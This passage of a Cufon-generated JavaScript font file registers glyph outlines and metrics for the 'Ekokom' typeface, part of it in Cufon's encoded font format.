@hx}H|@,!ax}H|@,H|K~0o@z>*n?|sx}H|@,Uh2$*U!,w0@z!U!,w0n,H=x}H|@JQ~x}H|@,y;x}H|@,!~x}H|@,MBx}H|@,Usx}H|@Jd^x}H|@JHox}H|@JS*x}H|@JQTx}H|@JNDx}Hg@zb7x}H|@Jb0x}H|@JN0x}H|@,Q*x}H|@Jy0x}H|@JVTx}H|@,U|x}H|@,yDyT0U!,w0nBQU!,w|STnU!,w|SBQU!,w|NT~U!,w0@;MU!,w0nJVU!,w|Nrbfx}H|@,b7x}H|@JbDx}H|@,b|x}H|@,@6x}H|@,!^x}H|@JNgnM0o@zb;@,Ug5~oU!,w|NsQU!,w0@zQU!,w0nsMU!,w0@Tnpx}H|@JQBnB>U!,w|Sz~U!,w0@;dqx}H|@Jbsx}H|@,nT,b*U!,w0n,!U!,w|NT*U!,w0ns*U!,w|S,>rUd0o@z>a@o0o@z>*@~0o@zb0@;hU!,w0nJnU!,w0@zMU!,w|N;MU!,w0@,MU!,w0@rQ3x}H|@,nax}H|@Jbox}H|@,H;Qd0o@z>~N~0o@z>^S~MU!,w0nT>U!,w0@sM*x}H|@JH7U~0o@zboSd0o@z>TnM0o@zb;@o0o@z>*S~0o@zb;Nd0o@z>^no0o@z>anM0o@zboNd0o@z>BpbSurM0o@z>TSd~)S~0o@zbo@s=U!,w0@BH?yM0o@zbonM|ax}H|@JnBx}H|@JHsvd0o@z>*pd0o@z>Bno0o@Tw0SM0o@z>TnrH&N~0o@zbg@~d?Uo0o@z>~S?H%@x&bx}H|@J@6vo0o@z>^nd0o@Twgn~0o@zbsn~0o@zbDno0o@z>a@d0o@z>aN~0o@zb;nd0o@z>a@aS|x}H|@,S~x}H|@JH;x}H|@JV^x}H|@Jy|yd0o@zbgS~0o@z>*pb~%dz74x}H|@,wox}H|@JNo@bcU!,w0@s>U!,w0nznU!,wg@,*U!,w|NBVvx}H|@Jy;VroU!,:|@,Vy:;VU!,w0nrQU!,w0@BQU!,w|S,MU!,w0nzMU!,w|STSU!,wg@,~U!,w0n;M}x}H|@JMax}H|@,M~x}H|@,dBpM0o@z>^@s~z!TdU!,:|@rnU!,w|N,!U!,w0@;VU!,w0@,~U2o0o@z>a@}VU!,w|ST~5ud0o@z>^@~0o@zbDpM0o@z>ano0o@z>T@M0o@zb0@?*U!,w0@s~U!,w0@,SUx$>K5d0o@z>B@}!U!,w|SrdU!,:0@TQU!,:|@,nU!,w0p,:*No0o@zb|SaoU!,w0@,!U!,w0nTVxx}H|@,!THo0o@z>*No0o@Tw0pHoU!,w0@znU!,w0@zya2?n|GJ~D-$:a-K0&3,w)Uzoa2?w)Gzo|2B0~GB!Dv$0?3r:PSah?G}~|v}@=u6DfvrNqNahtvsDtxalXp?!6!o|P-,]q3sqP-o|PvrhsvrV~Nd|PN6&]2acU2B&*v6VgvrV&!M|PN6&]vBM4!}Q&SJ~Dx$hTu?0&G?n&SJd*x$hTua^^2;^P!Jds!$*)G;n*!J~tGahqG6nDGBMcSK^&SB=g-zc&3J|f-gc&-r!GNoc&xdD=w>$zbMJ}:Q-2@np3yVK,HdrxNSvGU!u5l*aT^~B?q&%4)cPt|0gsDo;67h1f]=ZXUMc&xxD&-$^l")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":200,"face":{"font-family":"Ekokom","font-weight":500,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 6 3 0 0 0 0 0 0","ascent":"288","descent":"-72","x-height":"5","bbox":"-18 -320 379 92","underline-thickness":"18","underline-position":"-36","stemh":"32","stemv":"41","unicode-range":"U+0020-U+2122"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 *
 * Copyright:
 * CZ-3.0, 1990 Adobe Systems Inc., 2003 Quentin spol. s r.o.
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"14,0r9,-40r40,0r-9,40r-40,0xm134,0r9,-40r40,0r-9,40r-40,0xm254,0r8,-40r40,0r-8,40r-40,0","w":360},{"d":"14,-107v0,-83,53,-156,141,-156v67,0,107,50,107,114v0,81,-52,155,-138,155v-70,0,-110,-42,-110,-113xm48,-107v0,50,25,84,76,84v68,0,104,-65,104,-126v0,-48,-25,-85,-73,-85v-72,0,-107,65,-107,127xm109,-271r30,-39r42,0r-45,39r-27,0xm173,-271r30,-39r43,0r-46,39r-27,0","w":273},{"d":"139,-61r30,0v-10,40,-39,63,-79,65v-3,5,-12,11,-12,15v21,-4,42,3,42,25v0,35,-50,38,-78,24r6,-16v13,7,42,11,45,-5v-1,-13,-21,-13,-32,-8r-7,-11r20,-24v-44,-4,-66,-34,-66,-80v0,-59,36,-114,103,-114v42,0,68,20,69,63r-30,0v0,-23,-15,-36,-39,-36v-47,0,-73,46,-73,87v0,29,12,53,46,53v26,0,46,-15,55,-38","w":193},{"d":"37,-72v0,30,15,49,48,49v46,0,72,-53,72,-92v0,-28,-16,-48,-46,-48v-49,0,-74,50,-74,91xm213,-232r30,0r-6,25r-29,0r-44,207r-29,0r6,-27v-39,59,-135,30,-135,-45v0,-57,38,-118,103,-118v24,-1,50,9,59,32r10,-49r-71,0r5,-25r71,0r5,-25r30,0","w":213},{"d":"129,-95v-28,18,-102,0,-102,46v0,40,72,28,86,2v8,-15,12,-31,16,-48xm50,-130r-31,0v6,-41,41,-60,81,-60v36,0,68,9,68,47v0,39,-19,73,-23,111v-2,15,10,13,19,9r-5,23v-20,10,-48,2,-43,-23v-23,37,-120,43,-120,-25v0,-54,53,-57,94,-61v32,-3,47,-5,47,-30v0,-41,-84,-28,-87,9xm92,-231v0,11,9,20,20,20v11,0,19,-9,19,-20v0,-11,-8,-20,-19,-20v-11,0,-20,9,-20,20xm79,-231v0,-18,15,-33,33,-33v18,0,32,15,32,33v0,18,-14,33,-32,33v-18,0,-33,-15,-33,-33","w":186},{"d":"3,0r53,-257v82,0,178,-15,178,71v0,32,-23,81,-99,81r-76,0r-22,105r-34,0xm85,-228r-20,94v60,1,134,9,134,-52v0,-60,-63,-38,-114,-42","w":233},{"d":"85,-228r-19,89r77,0v54,0,63,-32,63,-50v-2,-57,-70,-34,-121,-39xm3,0r54,-257v80,4,181,-21,183,65v0,34,-23,65,-57,70v47,15,12,82,26,122r-35,0v-3,-9,-5,-29,0,-55v11,-61,-23,-55,-38,-55r-76,0r-23,110r-34,0xm204,-310r-46,39r-38,0r-31,-39r32,0r20,24r30,-24r33,0","w":246},{"d":"-24,0r87,-99r-41,-87r35,0r28,68r56,-68r37,0r-80,90r47,96r-34,0r-34,-76r-64,76r-37,0","w":173},{"d":"-2,0r39,-186r29,0v-2,13,-9,29,-8,40v16,-29,40,-47,78,-44r-7,32v-86,-5,-82,89,-100,158r-31,0xm154,-257r-49,51r-31,0r-28,-51r28,0r18,33r34,-33r28,0","w":119},{"d":"173,-228r-88,124r69,0r27,-124r-8,0xm-28,0r187,-257r188,0r-6,29r-126,0r-17,81r119,0r-7,29r-118,0r-19,89r128,0r-5,29r-164,0r15,-75r-83,0r-53,75r-39,0","w":333},{"d":"38,-76v0,27,15,50,46,50v46,0,68,-52,68,-89v0,-29,-16,-48,-48,-48v-43,0,-66,53,-66,87xm199,-186r-34,159v-9,60,-38,103,-99,103v-38,0,-73,-17,-74,-58r31,0v2,25,23,31,46,31v47,1,60,-40,66,-76v-37,55,-127,24,-127,-49v0,-55,36,-114,96,-114v28,-1,54,16,60,38r6,-34r29,0xm73,-257r19,0v2,45,64,34,76,0r18,0v-10,59,-116,72,-113,0","w":206},{"d":"221,-181r-34,0v1,-41,-24,-53,-59,-53v-25,0,-60,11,-60,42v0,39,46,41,77,51v32,10,62,23,62,69v0,53,-54,78,-100,78v-62,0,-106,-27,-102,-90r35,0v-2,46,26,61,68,61v32,0,64,-14,64,-49v0,-39,-48,-42,-80,-52v-31,-9,-58,-27,-58,-65v0,-50,48,-74,94,-74v51,0,95,25,93,82xm201,-310r-47,39r-38,0r-31,-39r32,0r20,24r30,-24r34,0","w":233},{"d":"354,-257r-118,257r-36,0r-17,-222r-101,222r-37,0r-16,-257r34,0r9,216r99,-216r39,0r15,217r94,-217r35,0","w":333},{"d":"3,0r14,-69r-28,18r6,-30r28,-17r34,-159r34,0r-28,135r79,-49r-6,30r-79,48r-14,64r136,0r-6,29r-170,0"},{"d":"37,-72v0,30,15,49,48,49v46,0,72,-53,72,-92v0,-28,-16,-48,-46,-48v-49,0,-74,50,-74,91xm218,-257r-54,257r-29,0r6,-27v-39,59,-135,30,-135,-45v0,-57,38,-118,103,-118v24,-1,50,9,59,32r20,-99r30,0xm228,-229r6,-28r31,0v-7,29,-9,64,-44,63r3,-13v14,0,19,-16,20,-22r-16,0","w":227},{"d":"-2,0r39,-186r30,0v-1,9,-6,21,-5,28v24,-41,122,-50,118,15v-3,48,-20,98,-28,143r-31,0r28,-138v-4,-39,-60,-25,-78,-4v-29,33,-28,94,-42,142r-31,0"},{"d":"3,0r54,-257r34,0r-48,228r136,0r-6,29r-170,0xm74,-271r30,-39r43,0r-45,39r-28,0"},{"d":"262,-257r-32,154v-8,69,-48,110,-113,109v-75,0,-108,-40,-93,-112r32,-151r34,0r-34,160v-12,50,11,74,61,74v56,0,68,-32,78,-80r33,-154r34,0","w":259},{"d":"3,0r54,-257r37,0r92,213r43,-213r33,0r-54,257r-37,0r-92,-211r-43,211r-33,0xm225,-310r-46,39r-38,0r-31,-39r32,0r20,24r30,-24r33,0","w":259},{"d":"3,0r53,-257r34,0r-8,41v74,-3,143,-2,143,71v0,32,-23,81,-99,81r-76,0r-13,64r-34,0xm76,-187r-20,94v60,1,134,9,134,-52v0,-60,-63,-38,-114,-42","w":233},{"d":"42,-76v0,28,9,50,36,54r31,-143v-44,3,-67,48,-67,89xm142,-61r31,0v-11,41,-42,65,-86,65r-8,38r-14,0r8,-39v-41,-5,-62,-34,-62,-79v0,-59,40,-114,103,-114r7,-33r14,0r-7,33v34,4,56,25,56,63r-31,0v0,-22,-12,-35,-31,-38r-30,144v24,-2,42,-17,50,-40"},{"d":"3,0r54,-257r177,0r-6,29r-143,0r-17,81r133,0r-6,29r-133,0r-19,89r145,0r-7,29r-178,0xm129,-271r30,-39r43,0r-45,39r-28,0","w":219},{"d":"108,-163v-73,0,-106,140,-20,140v45,0,69,-51,69,-88v0,-29,-16,-52,-49,-52xm6,-73v0,-61,39,-117,104,-117v50,0,78,27,78,77v0,61,-38,117,-103,117v-49,0,-79,-32,-79,-77xm69,-205r34,-52r40,0r-49,52r-25,0xm129,-205r33,-52r41,0r-49,52r-25,0","w":206},{"d":"85,-228r-19,89r77,0v54,0,63,-32,63,-50v-2,-57,-70,-34,-121,-39xm3,0r54,-257v80,4,181,-21,183,65v0,34,-23,65,-57,70v47,15,12,82,26,122r-35,0v-3,-9,-5,-29,0,-55v11,-61,-23,-55,-38,-55r-76,0r-23,110r-34,0xm126,-271r30,-39r43,0r-45,39r-28,0","w":246},{"d":"-2,0r40,-186r28,0v-1,9,-7,21,-6,28v24,-34,98,-51,112,1v14,-20,38,-33,63,-33v26,0,52,11,52,41v0,54,-20,99,-29,149r-30,0r29,-138v-4,-39,-60,-24,-76,0v-23,36,-24,92,-37,138r-31,0r28,-139v-2,-39,-56,-21,-72,-1v-27,36,-25,93,-40,140r-31,0","w":306},{"d":"44,-202r-24,0v-5,-59,110,-75,110,-12v0,51,-80,60,-99,93r83,0r-3,20r-107,0v-4,-37,39,-57,68,-75v14,-9,33,-19,33,-37v0,-14,-10,-22,-26,-22v-22,0,-34,14,-35,33","w":119},{"d":"187,-186r-39,186r-30,0v1,-9,6,-21,5,-28v-24,41,-123,50,-118,-16v4,-46,20,-97,28,-142r31,0r-28,137v0,18,14,26,32,26v76,-4,72,-99,89,-163r30,0xm96,-231v0,11,9,20,20,20v11,0,19,-9,19,-20v0,-11,-8,-20,-19,-20v-11,0,-20,9,-20,20xm83,-231v0,-18,15,-33,33,-33v18,0,32,15,32,33v0,18,-14,33,-32,33v-18,0,-33,-15,-33,-33"},{"d":"79,-106r88,0r-19,-121xm-20,0r155,-257r37,0r47,257r-35,0r-12,-77r-109,0r-45,77r-38,0xm107,-278r4,-20r97,0r-4,20r-97,0","w":240},{"d":"-2,0r39,-181v9,-49,31,-82,81,-82v35,0,67,14,67,54v1,35,-25,60,-54,67v27,4,41,27,41,53v-1,59,-48,103,-116,92r5,-26v45,3,80,-19,80,-64v0,-37,-26,-43,-57,-42r5,-25v32,2,65,-12,65,-49v0,-22,-19,-33,-35,-33v-36,0,-46,29,-52,57r-38,179r-31,0","w":193},{"d":"-2,0r54,-257r31,0r-54,257r-31,0","w":79},{"d":"17,-79r0,-24r182,0r0,24r-182,0xm85,-165v0,-13,11,-23,23,-23v12,0,23,11,23,23v0,12,-11,23,-23,23v-13,0,-23,-11,-23,-23xm85,-17v0,-13,11,-23,23,-23v12,0,23,11,23,23v0,12,-11,23,-23,23v-13,0,-23,-11,-23,-23","w":216},{"d":"3,0r54,-257r177,0r-6,29r-143,0r-17,81r133,0r-6,29r-133,0r-19,89r145,0r-7,29r-178,0xm133,-271r8,-38r32,0r-8,38r-32,0","w":219},{"d":"3,0r54,-257r177,0r-6,29r-143,0r-17,81r133,0r-6,29r-133,0r-19,89r145,0r-7,29r-178,0xm156,-310r16,39r-26,0r-30,-39r40,0","w":219},{"d":"38,-76v0,27,15,50,46,50v46,0,68,-52,68,-89v0,-29,-16,-48,-48,-48v-43,0,-66,53,-66,87xm199,-186r-34,159v-9,60,-38,103,-99,103v-38,0,-73,-17,-74,-58r31,0v2,25,23,31,46,31v47,1,60,-40,66,-76v-37,55,-127,24,-127,-49v0,-55,36,-114,96,-114v28,-1,54,16,60,38r6,-34r29,0xm132,-230r-5,24r-29,0v5,-27,10,-51,40,-54r-2,11v-13,2,-17,10,-19,19r15,0","w":206},{"d":"50,-217r8,-40r40,0v-9,40,-9,89,-59,93r3,-17v19,-3,24,-20,28,-36r-20,0","w":100},{"d":"69,0r22,-103r-67,-154r36,0r53,125r97,-125r40,0r-125,154r-22,103r-34,0xm122,-271r30,-39r43,0r-45,39r-28,0","w":219},{"d":"108,-163v-73,0,-106,140,-20,140v45,0,69,-51,69,-88v0,-29,-16,-52,-49,-52xm6,-73v0,-61,39,-117,104,-117v50,0,78,27,78,77v0,61,-38,117,-103,117v-49,0,-79,-32,-79,-77xm120,-257r20,51r-23,0r-36,-51r39,0","w":206},{"d":"126,6v-40,0,-84,-32,-117,-2r-10,-27v35,-28,54,-48,41,-95r-31,0r4,-16r22,0v-26,-65,16,-129,79,-129v54,0,82,39,79,88r-32,0v3,-30,-12,-61,-44,-61v-50,-1,-71,58,-49,102r55,0r-3,16r-47,0v20,45,-44,94,-45,93v0,0,22,-10,40,-10v35,0,69,27,95,-2r12,25v-13,9,-34,18,-49,18"},{"d":"3,0r54,-257r177,0r-6,29r-143,0r-17,81r133,0r-6,29r-133,0r-19,89r145,0r-7,29r-178,0xm98,-278r5,-20r96,0r-4,20r-97,0","w":219},{"d":"3,0r54,-257r34,0r-54,257r-34,0xm85,-310r16,39r-26,0r-31,-39r41,0","w":93},{"d":"14,-107v0,-83,53,-156,141,-156v67,0,107,50,107,114v0,81,-52,155,-138,155v-70,0,-110,-42,-110,-113xm48,-107v0,50,25,84,76,84v68,0,104,-65,104,-126v0,-48,-25,-85,-73,-85v-72,0,-107,65,-107,127xm102,-271r46,-39r38,0r31,39r-32,0r-20,-25r-30,25r-33,0","w":273},{"d":"53,-165v0,22,7,34,28,34v31,0,42,-44,42,-74v0,-20,-8,-30,-26,-30v-31,0,-44,46,-44,70xm75,10r157,-271r23,0r-157,271r-23,0xm185,-48v0,-39,20,-92,66,-92v34,0,53,18,53,53v0,41,-19,91,-67,91v-32,0,-52,-20,-52,-52xm209,-49v0,22,8,34,29,34v31,0,41,-44,41,-74v0,-20,-8,-31,-26,-31v-31,0,-44,47,-44,71xm28,-163v0,-39,21,-92,67,-92v34,0,53,17,53,52v0,41,-20,92,-68,92v-32,0,-52,-20,-52,-52","w":333},{"d":"3,0r54,-257r177,0r-6,29r-143,0r-17,81r133,0r-6,29r-133,0r-19,89r145,0r-7,29r-178,0xm215,-310r-47,39r-38,0r-31,-39r32,0r20,24r30,-24r34,0","w":219},{"d":"203,0r-2,-26v-19,22,-49,32,-77,32v-70,0,-110,-42,-110,-113v0,-83,53,-156,141,-156v57,0,103,27,103,86r-34,0v0,-39,-32,-57,-69,-57v-72,0,-107,65,-107,127v0,50,25,84,76,84v54,0,81,-34,93,-84r-82,0r5,-28r112,0r-28,135r-21,0xm101,39r6,-25r29,0v-5,28,-10,52,-41,55r3,-11v13,-2,17,-10,19,-19r-16,0","w":273},{"d":"3,0r54,-257r34,0r-54,257r-34,0xm18,-271r47,-39r38,0r31,39r-33,0r-20,-25r-30,25r-33,0","w":93},{"d":"-2,0r54,-257r31,0r-54,257r-31,0xm57,-271r30,-40r40,0r-45,40r-25,0","w":79},{"d":"0,0r9,-40r40,0r-9,40r-40,0xm91,-257v-13,68,-31,129,-50,191r-16,0r15,-111r17,-80r34,0","w":93},{"d":"108,-163v-73,0,-106,140,-20,140v45,0,69,-51,69,-88v0,-29,-16,-52,-49,-52xm6,-73v0,-61,39,-117,104,-117v50,0,78,27,78,77v0,61,-38,117,-103,117v-49,0,-79,-32,-79,-77xm133,-213r8,-37r32,0r-8,37r-32,0xm74,-213r8,-37r32,0r-8,37r-32,0","w":206},{"d":"19,-223r4,-20r97,0r-4,20r-97,0","w":79},{"d":"99,-113v36,0,55,-29,55,-63v0,-32,-16,-52,-49,-52v-62,-1,-77,117,-6,115xm187,-170v0,80,-31,174,-116,174v-42,0,-71,-21,-70,-65r33,0v0,24,12,38,37,38v48,1,68,-53,76,-88v-39,52,-128,17,-128,-50v0,-52,35,-94,89,-94v54,0,79,34,79,85"},{"d":"3,0r25,-122r-23,0r5,-25r23,0r24,-110r90,0v64,0,97,37,97,98v0,97,-58,159,-143,159r-98,0xm84,-228r-17,81r72,0r-5,25r-72,0r-20,93r60,0v73,0,108,-64,108,-126v0,-38,-14,-73,-71,-73r-55,0","w":253},{"d":"-14,0r6,-28r193,-200r-147,0r7,-29r188,0r-6,29r-195,199r165,0r-7,29r-204,0xm122,-271r8,-38r32,0r-8,38r-32,0","w":219},{"d":"14,-107v0,-83,53,-156,141,-156v67,0,107,50,107,114v0,81,-52,155,-138,155v-70,0,-110,-42,-110,-113xm48,-107v0,50,25,84,76,84v68,0,104,-65,104,-126v0,-48,-25,-85,-73,-85v-72,0,-107,65,-107,127xm170,-310r16,39r-26,0r-30,-39r40,0","w":273},{"d":"3,0r54,-257r34,0r-54,257r-34,0","w":93},{"d":"212,0r8,-35r-72,0r4,-20r97,-99r21,0r-23,100r22,0r-5,19r-21,0r-8,35r-23,0xm174,-54r50,0r14,-66xm103,-255r-32,154r-24,0r24,-117v-14,5,-26,6,-43,6r4,-18v26,0,46,-11,54,-25r17,0xm45,10r156,-271r23,0r-156,271r-23,0","w":300},{"d":"274,-186r-96,186r-32,0r-10,-145r-67,145r-32,0r-22,-186r32,0r12,148r67,-148r35,0r10,148r70,-148r33,0","w":273},{"d":"-2,0r39,-186r30,0v-1,9,-6,21,-5,28v24,-41,122,-50,118,15v-3,48,-20,98,-28,143r-31,0r28,-138v-4,-39,-60,-25,-78,-4v-29,33,-28,94,-42,142r-31,0xm99,-206r33,-51r41,0r-49,51r-25,0"},{"d":"-2,0r39,-186r30,0v-1,9,-6,21,-5,28v24,-41,122,-50,118,15v-3,48,-20,98,-28,143r-31,0r28,-138v-4,-39,-60,-25,-78,-4v-29,33,-28,94,-42,142r-31,0xm57,39r5,-25r29,0v-5,27,-9,52,-40,55r2,-11v13,-2,17,-10,19,-19r-15,0"},{"d":"79,-106r88,0r-19,-121xm-20,0r155,-257r37,0r47,257r-35,0r-12,-77r-109,0r-45,77r-38,0xm163,-310r16,39r-26,0r-31,-39r41,0","w":240},{"d":"180,-127r-30,0v0,-23,-15,-36,-39,-36v-47,0,-73,46,-73,87v0,29,12,53,46,53v26,0,46,-15,55,-38r30,0v-11,41,-42,65,-85,65v-51,0,-76,-30,-76,-80v0,-59,36,-114,103,-114v42,0,68,20,69,63xm179,-257r-49,51r-31,0r-27,-51r27,0r18,33r34,-33r28,0","w":193},{"d":"14,-107v0,-83,53,-156,141,-156v67,0,107,50,107,114v0,81,-52,155,-138,155v-70,0,-110,-42,-110,-113xm48,-107v0,50,25,84,76,84v68,0,104,-65,104,-126v0,-48,-25,-85,-73,-85v-72,0,-107,65,-107,127xm180,-271r8,-38r32,0r-8,38r-32,0xm111,-271r8,-38r32,0r-8,38r-32,0","w":273},{"d":"28,6r0,-105r24,0r0,105r-24,0xm52,-263r0,105r-24,0r0,-105r24,0","w":79},{"d":"40,-111r108,0v2,-26,-10,-52,-44,-52v-36,0,-55,23,-64,52xm175,-84r-140,0v-17,69,84,81,101,26r31,0v-10,41,-44,62,-85,62v-62,0,-78,-43,-78,-75v0,-71,44,-119,95,-119v64,0,87,46,76,106xm172,-257r-48,51r-31,0r-28,-51r28,0r18,33r33,-33r28,0","w":193},{"d":"29,0r-31,0r39,-186r31,0xm38,-206r33,-51r41,0r-49,51r-25,0","w":79},{"d":"129,-95v-28,18,-102,0,-102,46v0,40,72,28,86,2v8,-15,12,-31,16,-48xm50,-130r-31,0v6,-41,41,-60,81,-60v36,0,68,9,68,47v0,39,-19,73,-23,111v-2,15,10,13,19,9r-5,23v-20,10,-48,2,-43,-23v-23,37,-120,43,-120,-25v0,-54,53,-57,94,-61v32,-3,47,-5,47,-30v0,-41,-84,-28,-87,9xm63,-257r18,0v1,44,66,35,76,0r18,0v-10,59,-116,73,-112,0","w":186},{"d":"3,0r53,-257r169,0r-6,29r-135,0r-17,81r119,0r-6,29r-119,0r-24,118r-34,0","w":206},{"d":"3,0r54,-257r34,0r-26,127r145,-127r46,0r-124,106r83,151r-38,0r-70,-130r-52,43r-18,87r-34,0xm85,39r6,-25r29,0v-5,27,-9,52,-40,55r2,-11v13,-2,17,-10,19,-19r-16,0","w":240},{"d":"180,-127r-30,0v0,-23,-15,-36,-39,-36v-47,0,-73,46,-73,87v0,29,12,53,46,53v26,0,46,-15,55,-38r30,0v-11,41,-42,65,-85,65v-51,0,-76,-30,-76,-80v0,-59,36,-114,103,-114v42,0,68,20,69,63","w":193},{"d":"-2,0r54,-257r31,0r-54,257r-31,0xm93,-229r6,-28r31,0v-8,28,-8,64,-44,63r3,-13v14,0,18,-16,19,-22r-15,0","w":97},{"d":"40,-111r108,0v2,-26,-10,-52,-44,-52v-36,0,-55,23,-64,52xm175,-84r-140,0v-17,69,84,81,101,26r31,0v-10,41,-44,62,-85,62v-62,0,-78,-43,-78,-75v0,-71,44,-119,95,-119v64,0,87,46,76,106xm56,-206r48,-51r31,0r28,51r-27,0r-19,-33r-33,33r-28,0","w":193},{"d":"-2,0r54,-257r31,0r-54,257r-31,0xm-8,39r5,-25r30,0v-5,28,-10,52,-41,55r2,-11v13,-2,18,-10,20,-19r-16,0","w":79},{"d":"3,0r54,-257r37,0r92,213r43,-213r33,0r-54,257r-37,0r-92,-211r-43,211r-33,0xm89,39r5,-25r29,0v-5,27,-9,52,-40,55r2,-11v13,-2,17,-10,19,-19r-15,0","w":259},{"d":"129,-95v-28,18,-102,0,-102,46v0,40,72,28,86,2v8,-15,12,-31,16,-48xm50,-130r-31,0v6,-41,41,-60,81,-60v36,0,68,9,68,47v0,39,-19,73,-23,111v-2,15,10,13,19,9r-5,23v-20,10,-48,2,-43,-23v-23,37,-120,43,-120,-25v0,-54,53,-57,94,-61v32,-3,47,-5,47,-30v0,-41,-84,-28,-87,9xm138,-211v-21,0,-58,-36,-67,-2r-19,0v5,-17,14,-39,35,-39v24,0,58,35,70,2r18,0v-6,18,-15,39,-37,39","w":186},{"d":"29,0r-31,0r39,-186r31,0xm71,-213r8,-37r32,0r-8,37r-32,0xm13,-213r8,-37r32,0r-8,37r-32,0","w":79},{"d":"108,-163v-73,0,-106,140,-20,140v45,0,69,-51,69,-88v0,-29,-16,-52,-49,-52xm6,-73v0,-61,39,-117,104,-117v50,0,78,27,78,77v0,61,-38,117,-103,117v-49,0,-79,-32,-79,-77xm147,-211v-22,0,-58,-36,-68,-2r-19,0v5,-17,15,-39,36,-39v23,0,58,35,69,2r18,0v-6,18,-14,39,-36,39","w":206},{"d":"148,0v-17,4,-43,29,-43,41v0,7,1,14,22,14v5,0,10,0,17,-1r-4,17v-24,2,-62,3,-62,-25v0,-17,19,-33,41,-47v1,-8,6,-20,4,-27v-24,41,-123,50,-118,-16v4,-46,20,-97,28,-142r31,0r-28,137v0,18,14,26,32,26v76,-4,72,-99,89,-163r30,0"},{"d":"-19,0r4,-23r130,-136r-100,0r5,-27r142,0r-5,22r-131,137r112,0r-6,27r-151,0xm80,-213r7,-38r33,0r-8,38r-32,0","w":159},{"d":"108,-163v-73,0,-106,140,-20,140v45,0,69,-51,69,-88v0,-29,-16,-52,-49,-52xm6,-73v0,-61,39,-117,104,-117v50,0,78,27,78,77v0,61,-38,117,-103,117v-49,0,-79,-32,-79,-77xm72,-223r5,-20r97,0r-4,20r-98,0","w":206},{"d":"221,-181r-34,0v1,-41,-24,-53,-59,-53v-25,0,-60,11,-60,42v0,39,46,41,77,51v32,10,62,23,62,69v0,53,-54,78,-100,78v-62,0,-106,-27,-102,-90r35,0v-2,46,26,61,68,61v32,0,64,-14,64,-49v0,-39,-48,-42,-80,-52v-31,-9,-58,-27,-58,-65v0,-50,48,-74,94,-74v51,0,95,25,93,82xm82,39r5,-25r30,0v-5,28,-10,52,-41,55r2,-11v13,-2,18,-10,20,-19r-16,0","w":233},{"d":"182,-186r-123,218v-16,30,-43,55,-82,39r6,-25v36,20,51,-25,65,-46r-33,-186r33,0r22,148r78,-148r34,0xm115,-213r8,-37r32,0r-8,37r-32,0xm57,-213r7,-37r32,0r-7,37r-32,0","w":173},{"d":"5,0r9,-40r40,0r-9,40r-40,0","w":100},{"d":"3,0r54,-257r90,0v64,0,97,37,97,98v0,97,-58,159,-143,159r-98,0xm84,-228r-42,199r60,0v73,0,108,-64,108,-126v0,-38,-14,-73,-71,-73r-55,0xm198,-310r-46,39r-39,0r-30,-39r31,0r20,24r31,-24r33,0","w":253},{"d":"3,0r54,-257r34,0r-54,257r-34,0xm55,-271r30,-39r44,0r-46,39r-28,0","w":93},{"d":"14,-107v0,-83,53,-156,141,-156v67,0,107,50,107,114v0,81,-52,155,-138,155v-70,0,-110,-42,-110,-113xm48,-107v0,50,25,84,76,84v68,0,104,-65,104,-126v0,-48,-25,-85,-73,-85v-72,0,-107,65,-107,127xm190,-271v-21,0,-58,-34,-68,-2r-19,0v5,-17,15,-39,36,-39v24,1,58,35,69,2r18,0v-6,18,-14,39,-36,39","w":273},{"d":"108,-155v-47,0,-71,48,-71,83v0,29,18,49,51,49v45,0,70,-50,70,-85v0,-27,-17,-47,-50,-47xm167,-264r16,13r-39,20v74,53,59,235,-59,235v-49,0,-79,-33,-79,-76v0,-75,86,-145,151,-91v-7,-22,-27,-47,-39,-55r-41,21r-15,-15r41,-20v-6,-5,-14,-10,-22,-15r23,-16v8,5,16,10,25,18","w":206},{"d":"-2,0r39,-186r30,0v-1,9,-6,21,-5,28v24,-41,122,-50,118,15v-3,48,-20,98,-28,143r-31,0r28,-138v-4,-39,-60,-25,-78,-4v-29,33,-28,94,-42,142r-31,0xm180,-257r-49,51r-31,0r-28,-51r28,0r18,33r34,-33r28,0"},{"d":"5,0r8,-40r41,0r-8,40r-41,0xm84,-186r-8,40r-40,0r8,-40r40,0","w":100},{"d":"-14,0r6,-28r193,-200r-147,0r7,-29r188,0r-6,29r-195,199r165,0r-7,29r-204,0","w":219},{"d":"-2,0r39,-186r30,0v-1,9,-6,21,-5,28v24,-41,122,-50,118,15v-3,48,-20,98,-28,143r-31,0r28,-138v-4,-39,-60,-25,-78,-4v-29,33,-28,94,-42,142r-31,0xm148,-211v-21,0,-58,-36,-67,-2r-19,0v5,-17,15,-39,36,-39v24,0,58,34,69,2r18,0v-6,18,-15,39,-37,39"},{"d":"53,-164r0,-93r24,0r0,93r-24,0xm103,-164r0,-93r24,0r0,93r-24,0","w":153},{"d":"203,0r-2,-26v-19,22,-49,32,-77,32v-70,0,-110,-42,-110,-113v0,-83,53,-156,141,-156v57,0,103,27,103,86r-34,0v0,-39,-32,-57,-69,-57v-72,0,-107,65,-107,127v0,50,25,84,76,84v54,0,81,-34,93,-84r-82,0r5,-28r112,0r-28,135r-21,0","w":273},{"d":"-10,71r69,-334r68,0r-5,23r-39,0r-59,288r39,0r-5,23r-68,0","w":93},{"d":"50,-140v0,38,98,33,98,87v0,41,-39,57,-75,57v-3,5,-12,11,-12,15v21,-4,42,3,42,25v0,35,-50,38,-78,24r7,-16v13,6,41,11,44,-5v-1,-13,-20,-13,-31,-8r-7,-11r20,-24v-35,-3,-61,-21,-61,-63r30,0v-1,28,22,36,48,36v20,0,42,-7,42,-28v0,-38,-98,-33,-98,-86v0,-35,34,-53,69,-53v35,0,70,15,70,59r-30,0v1,-21,-18,-32,-39,-32v-19,0,-39,4,-39,23","w":173},{"d":"270,-59r32,0v-14,42,-46,63,-90,63v-29,0,-53,-7,-65,-36v-31,57,-141,47,-141,-37v0,-59,40,-121,104,-121v28,0,52,7,62,36v32,-60,141,-44,141,37v0,9,-2,25,-4,33r-137,0v-8,35,8,61,45,61v24,0,45,-15,53,-36xm37,-70v0,26,15,47,46,47v51,0,67,-62,67,-101v0,-26,-19,-39,-43,-39v-46,0,-70,55,-70,93xm240,-163v-35,0,-56,22,-63,52r105,0v2,-30,-10,-52,-42,-52","w":326},{"d":"37,-185v0,17,10,30,31,30v28,0,45,-26,45,-52v0,-17,-9,-30,-30,-3